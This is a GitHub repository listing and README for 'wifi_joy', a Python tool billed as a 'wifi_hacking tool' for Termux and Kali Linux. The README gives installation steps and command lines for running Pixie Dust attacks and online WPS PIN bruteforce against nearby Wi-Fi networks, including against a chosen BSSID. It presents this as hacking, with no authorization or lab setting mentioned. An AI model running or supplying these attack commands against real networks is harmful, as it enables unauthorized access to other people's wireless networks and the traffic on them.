https://github.com/joy43/wifi_joy
wifi_hacking tool
https://github.com/joy43/wifi_joy
kali-linux python wifi-network
Last synced: 3 months ago
JSON representation
wifi_hacking tool
- Host: GitHub
- URL: https://github.com/joy43/wifi_joy
- Owner: Joy43
- Created: 2024-11-05T09:58:41.000Z (7 months ago)
- Default Branch: main
- Last Pushed: 2024-11-05T14:23:54.000Z (7 months ago)
- Last Synced: 2024-11-28T19:11:54.258Z (7 months ago)
- Topics: kali-linux, python, wifi-network
- Language: Python
- Homepage: https://github.com/Joy43/wifi_joy
- Size: 14.6 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
## ssjoy
### Hack WIfi Using Termux! (Requires Root)
### Installation :
```bash
$ apt update && apt upgrade
$ apt install -y root-repo
$ apt install -y git tsu python wpa-supplicant pixiewps iw
$ git clone https://github.com/Joy43/wifi_joy.git
$ cd ssjoy
$ chmod +x joy.py
$ sudo python joy.py --help
```
* Run joy.py with python3
* On kali linux
```bash
python3 joy.py -i wlan0 -K
```#### Example : `python3 joy.py -i wlan0 -K`
#### Note:
**First turn off your Wifi.**
- Show avaliable networks and start Pixie Dust attack on a specified network.
- `sudo python joy.py -i wlan0 -K`
- - Start Pixie Dust attack on a specified BSSID:
`sudo python joy.py -i wlan0 -b 00:91:4C:C3:AC:28 -K`
- Launch online WPS bruteforce with the specified first half of the PIN:
- `sudo python joy.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234`
### Troubleshooting
**"Device or resource busy (-16)" - Turn on Wifi and Then Turn off Wifi.**